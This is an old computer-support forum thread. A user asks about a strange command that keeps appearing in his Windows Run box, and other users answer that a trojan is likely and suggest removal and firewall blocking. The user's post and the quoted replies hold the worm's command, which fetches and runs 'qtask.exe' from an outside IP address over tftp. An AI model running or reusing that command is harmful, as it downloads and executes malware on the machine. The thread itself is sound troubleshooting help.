Run command showing a tftp command on it's own

Discussion in 'Computer Support' started by kvine@marchnetworks.com, Jan 12, 2007.

  1. Guest

    Hi

    About 5 times yesterday this would show up in my Run command while it
    was working. I have no idea why and doing a virus and adaware scan
    does not fix it. I do not have Quicken installed on my PC.

    tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit

    I just want to get rid of it so what else can I try?

    Thanks
    Ken
     
    , Jan 12, 2007
    #1
    1. Advertising

  2. wrote:

    > About 5 times yesterday this would show up in my Run command while it
    > was working. I have no idea why and doing a virus and adaware scan
    > does not fix it. I do not have Quicken installed on my PC.
    >
    > tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit
    >
    > I just want to get rid of it so what else can I try?


    Maybe you are infected with this:
    http://www.sophos.com/security/analyses/w32rbotaku.html
    ...which says it uses the filename qtask.exe

    Or maybe you have some other trojan that is trying to download it.
    Try the first three (free) anti-spyware programs listed here:
    http://k75s.home.att.net/tips.html#spyware

    --
    -bts
    -Motorcycles defy gravity; cars just suck
     
    Beauregard T. Shagnasty, Jan 12, 2007
    #2
    1. Advertising

  3. why? Guest

    On 12 Jan 2007 05:34:19 -0800, wrote:

    >Hi
    >
    >About 5 times yesterday this would show up in my Run command while it
    >was working. I have no idea why and doing a virus and adaware scan
    >does not fix it. I do not have Quicken installed on my PC.


    So then tell your firewall to

    a) block tftp.exe or .com as an app
    b) block the IP address
    c) block the (default) port
    http://www.iana.org/assignments/port-numbers
    tftp 69/tcp Trivial File Transfer
    tftp 69/udp Trivial File Transfer

    >tftp -i 216.104.106.132 get qtask.exe& start qtask.exe& exit


    Output from ARIN WHOIS
    ARIN Home Page ARIN Site Map ARIN WHOIS Help Tutorial on Querying
    ARIN's WHOIS
    Search for :
    Search results for: 216.104.106.132

    OrgName: Cyber Beach Communications
    OrgID: CBCH
    Address: 500 Barrydowne Rd
    City: Sudbury
    StateProv: ON
    PostalCode: P3A-5W1
    Country: CA

    Ask them?

    >I just want to get rid of it so what else can I try?


    d) rename tftp.exe / .com
    e) delete it (c)

    >Thanks
    >Ken


    Fairly simple.

    Me
     
    why?, Jan 12, 2007
    #3
    1. Advertising

Want to reply to this thread or ask your own question?

It takes just 2 minutes to sign up (and it's free!). Just click the sign up button to choose a username and then you can ask your own questions on the forum.
Similar Threads
  1. z400d3
    Replies:
    0
    Views:
    2,109
    z400d3
    Jan 21, 2005
  2. =?Utf-8?B?VHJldm9y?=

    Allowing access to my own computers within my own network

    =?Utf-8?B?VHJldm9y?=, Jul 20, 2006, in forum: Wireless Networking
    Replies:
    2
    Views:
    829
    =?Utf-8?B?SmF2aTAwODQ=?=
    Jul 20, 2006
  3. Frank  ess

    Your own photos in your own book

    Frank ess, Dec 9, 2004, in forum: Digital Photography
    Replies:
    1
    Views:
    394
    Phil Stripling
    Dec 9, 2004
  4. Sharad
    Replies:
    0
    Views:
    651
    Sharad
    Feb 13, 2007
  5. urvin
    Replies:
    0
    Views:
    840
    urvin
    Apr 15, 2008
Loading...

Share This Page